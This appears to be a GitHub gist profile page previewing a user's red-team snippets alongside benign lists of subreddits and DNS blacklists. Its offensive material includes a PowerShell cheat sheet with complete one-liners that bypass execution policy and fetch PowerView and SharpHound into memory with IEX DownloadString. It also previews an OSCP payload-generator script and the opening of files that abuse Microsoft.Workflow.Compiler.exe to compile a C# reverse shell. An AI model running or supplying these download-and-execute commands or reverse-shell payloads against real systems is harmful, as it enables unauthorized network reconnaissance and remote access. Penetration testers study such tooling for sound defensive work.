Skip to content

Instantly share code, notes, and snippets.

View reanimat0r's full-sized avatar

Bart Black reanimat0r

View GitHub Profile
#!/usr/bin/env python3
from sys import argv
from taser.proto.http.spider import Spider
from taser.proto.http import extract_subdomain
from taser.logx import setup_consoleLogger
class MySpider(Spider):
def __init__(self, url):
Spider.__init__(self, url)
self.ur = url
#!/usr/bin/env bash
# Script to quickly and easily create non-meterpreter payloads for the OSCP
# m8r0wn
# Note: It is recommeneded to create a new directory before running this
# script. All payloads will be placed in the current directory
IP="127.0.0.1" # <YOUR IP HERE>
PORT=443 # You may have to change this if there are outbound restrictions on the target ;)
@reanimat0r
reanimat0r / pastebin_api.py
Created March 8, 2021 19:13 — forked from m8sec/pastebin_api.py
Python class to interact with the Pastebin API
#!/usr/bin/env python2.7
# Author: m8r0wn
# Description: Python class to interact with Pastebin API
import urllib2
import urllib
class paste_it():
#Class Variables
@reanimat0r
reanimat0r / RedTeam_CheatSheet.ps1
Created March 8, 2021 19:10 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@reanimat0r
reanimat0r / Reddit
Created November 11, 2020 21:34 — forked from zbetcheckin/Reddit
https://www.reddit.com
/r/netsec
/r/crypto
/r/cryptography
/r/Malware
/r/reverseeningeering
/r/csirt_tools/
/r/computerforensics/
/r/antiforensics/
/r/securityctf
# 387 DNS Blacklists / Realtime Blackhole Lists
# http://www.ietf.org/rfc/rfc5782.txt
# print(open("list.txt").read().splitlines()) # generate python list
0spam.fusionzero.com
0spam-killlist.fusionzero.com
0spamtrust.fusionzero.com
0spamurl.fusionzero.com
88.blocklist.zap
abuse-contacts.abusix.org
abuse.rfc-clueless.org
@reanimat0r
reanimat0r / REV.txt
Created October 13, 2020 14:01
Microsoft.Workflow.Compiler.exe Abuse for open a live C# Reverse Shell
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>Rev.Shell</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
@reanimat0r
reanimat0r / Rev.Shell
Created October 13, 2020 14:01
Abuse Microsoft.Workflow.Compiler.exe for compile C# Reverse Shell
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Workflow.Activities;
public class Program : SequentialWorkflowActivity